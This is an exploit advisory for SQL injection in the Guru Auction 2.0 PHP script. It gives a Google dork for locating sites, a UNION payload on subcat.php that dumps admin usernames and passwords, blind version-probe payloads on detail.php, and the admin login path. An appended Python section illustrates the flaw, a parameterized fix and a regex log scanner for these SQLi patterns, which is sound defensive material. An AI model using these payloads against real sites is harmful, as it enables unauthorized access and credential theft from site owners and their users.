Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author : v3n0m
Application : Guru Auction 2.0
Price : $49
Vendor : http://www.guruscript.com/
Google Dork : inurl:subcat.php?cate_id=
SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
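The two PoCs above show the same root cause: the `cate_id` and `item_id` request parameters reach the SQL string unfiltered. The following Python/sqlite3 example is added here for illustration and is not code from the advisory or from the Guru Auction product. It reproduces the defect pattern (string concatenation) beside the hardened form (integer validation plus a bound parameter), and adds a small access-log scan that flags the request shapes seen in the PoCs. The schema (a `subcategory` table, an `admin` table with `user_name`/`password` columns), the log lines and the script paths are constructed; because the advisory's payload uses MySQL's `group_concat(a, char(58), b)` form, the UNION payload below uses the SQLite equivalent `group_concat(a || ':' || b)` so that the mechanism can be run locally.

```python
import re
import sqlite3
import urllib.parse

# Constructed schema: the `admin(user_name, password)` shape is implied by the
# advisory's payload; the `subcategory` table and its columns are assumptions.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE admin (id INTEGER, user_name TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash');
        CREATE TABLE subcategory (cate_id INTEGER, name TEXT, description TEXT);
        INSERT INTO subcategory VALUES (1, 'Antiques', 'Old things');
        INSERT INTO subcategory VALUES (2, 'Books', 'Printed things');
    """)
    return conn

# The advisory's UNION payload, with MySQL concat replaced by SQLite's || operator.
UNION_PAYLOAD = "-9999 union all select null,group_concat(user_name||':'||password),null from admin--"

def list_subcat_vulnerable(conn, cate_id):
    # Defect pattern reported by the advisory: the raw request parameter is glued
    # into the statement, so anything after the number is parsed as SQL.
    sql = "SELECT cate_id, name, description FROM subcategory WHERE cate_id=" + cate_id
    return conn.execute(sql).fetchall()

def list_subcat_bound_only(conn, cate_id):
    # Binding alone already neutralises the payload: the whole string is compared
    # as a single value against the integer column and matches nothing.
    sql = "SELECT cate_id, name, description FROM subcategory WHERE cate_id=?"
    return conn.execute(sql, (cate_id,)).fetchall()

def list_subcat_fixed(conn, cate_id):
    # Hardened form: reject anything that is not a plain non-negative integer,
    # then bind the converted value instead of interpolating it.
    if not cate_id.isdigit():
        raise ValueError("cate_id must be a non-negative integer")
    sql = "SELECT cate_id, name, description FROM subcategory WHERE cate_id=?"
    return conn.execute(sql, (int(cate_id),)).fetchall()

# Constructed access-log lines (combined log format) whose query strings mirror
# the advisory's two PoC shapes plus two benign requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /shop/subcat.php?cate_id=3 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2010:13:55:41 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 7811
203.0.113.5 - - [10/Oct/2010:13:56:02 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 6001
198.51.100.7 - - [10/Oct/2010:13:57:10 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 6001
"""

# Tokens characteristic of the UNION and blind (version-probe) PoCs on this page.
SQLI_PATTERN = re.compile(
    r"(union\s+(all\s+)?select|@@version|substring\s*\(|group_concat\s*\()",
    re.IGNORECASE,
)

def flag_sqli_requests(log_text):
    """Return (path, decoded query) for each GET whose query string matches SQLI_PATTERN."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'"GET\s+(\S+)', line)
        if not m:
            continue
        url = m.group(1)
        # Decode percent-encoding and '+' so obfuscated spacing still matches.
        decoded = urllib.parse.unquote_plus(urllib.parse.urlsplit(url).query)
        if SQLI_PATTERN.search(decoded):
            hits.append((urllib.parse.urlsplit(url).path, decoded))
    return hits

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", list_subcat_vulnerable(db, UNION_PAYLOAD))
    print("bound only:", list_subcat_bound_only(db, UNION_PAYLOAD))
    try:
        list_subcat_fixed(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("fixed:", exc)
    for path, query in flag_sqli_requests(SAMPLE_LOG):
        print("flagged:", path, query)
```

Running the file shows the concatenated query leaking the `admin` row, the bound query returning nothing, the validated version refusing the input outright, and two of the four log lines flagged. The log pattern is deliberately narrow to the shapes on this page; in production it belongs alongside a WAF or a rate-based rule on the same path rather than as the only control.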
Admin login entry:
~~~~~~~~~~
http://domain.tld/[path]/admin/